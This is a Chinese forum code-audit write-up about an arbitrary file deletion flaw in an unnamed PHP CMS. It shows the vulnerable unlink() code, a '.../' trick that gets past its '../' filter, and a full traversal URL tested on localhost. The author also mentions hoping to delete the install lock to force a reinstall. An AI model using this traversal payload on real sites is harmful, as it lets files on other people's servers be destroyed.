来源;http://bbs.ichunqiu.com/thread-8979-1-1.html?from=ch
0x01 前言:
定期来论坛打个卡,免得那天被坏蛋哥干掉了都不知道,最近玩起代码审计了,挖到的都丢给补天了,重复率挺高的,打算每天坚持审一套系统,提交1个重复,我就挖10个,十个重复,我就挖100个,我就不信会全部重复。。。。。。。。。。。。。。
0x02 开头:
在删除某套系统的时候,发现可控参数进入了unlink函数,给我的第一感觉就是任意文件删除
[p=40, null, left][color=rgb(0, 0, 0)][font=微软雅黑, tahoma, arial]public function delupload(){
$action=isset($_GET['action']) ? $_GET['action'] : null;
$filename=isset($_GET['filename']) ? $_GET['filename'] : null;
$filename=str_replace('../','',$filename);
$filename=trim($filename,'.');
$filename=trim($filename,'/');
if($action=='del' && !empty($filename)){
$filename=G_UPLOAD.$filename;
$size=getimagesize($filename);
$filetype=explode('/',$size['mime']);
if($filetype[0]!='image'){
return false;
exit;
}
unlink($filename);
exit;
}[/font][/color][/p][p=40, null, left][color=rgb(0, 0, 0)][font=微软雅黑, tahoma, arial]
复制代码
0x03 分析:
调用了unlink函数来删除文件
unlink($filename);
而$filename
$filename=isset($_GET['filename']) ? $_GET['filename'] : null;
则是从GET进入的,可控
不过他这里进行了过滤,防止删除其他目录的文件
把../过滤掉了,防止跳转目录
清空了两边的 . 和 /
$filename=str_replace('../','',$filename);
$filename=trim($filename,'.');
$filename=trim($filename,'/');
0x04 突破:
$filename=$_GET['filename'];
$filename=str_replace('../','',$filename);
$filename=trim($filename,'.');
$filename=trim($filename,'/');
echo $filename;
?>
于是就本地实验起来了
直接输入../的话会被清除
开头和结尾清除了/和.
但是这个影响不大,在开头随便加个下一级目录就可以了,结尾肯定是你要删除的文件名,所以也可以无视
主要就是突破清空../
想了一下,竟然清空了../ 那我.../ 不就可以留下一个"."
实际测试成功
这样就可以实现目录跳转删除文件了
于是构造了这么一个url,删除网站根目录的一张照片
http://127.0.0.1/xxxcms/?api/xxxx/xxxxx/&action=del&filename=shaidan/.../...//.../...//.../...//xxxx.jpg
测试成功
0x05 结尾:
可惜的是只能删除网站任意图片
$size=getimagesize($filename);
$filetype=explode('/',$size['mime']);
if($filetype[0]!='image'){
return false;
exit;
}
被这个getimagesize函数限制住了,我测试了一下发现他是根据文件实际内容来判断是什么文件的,小菜鸟技术未入门,没想出怎么突破,本来还在想删除lock,直接重装系统的。。。
文章可能没什么技术含量在里面,毕竟小菜鸟我技术未入门,各位大牛见谅,如果文章中有错误,还望大家指出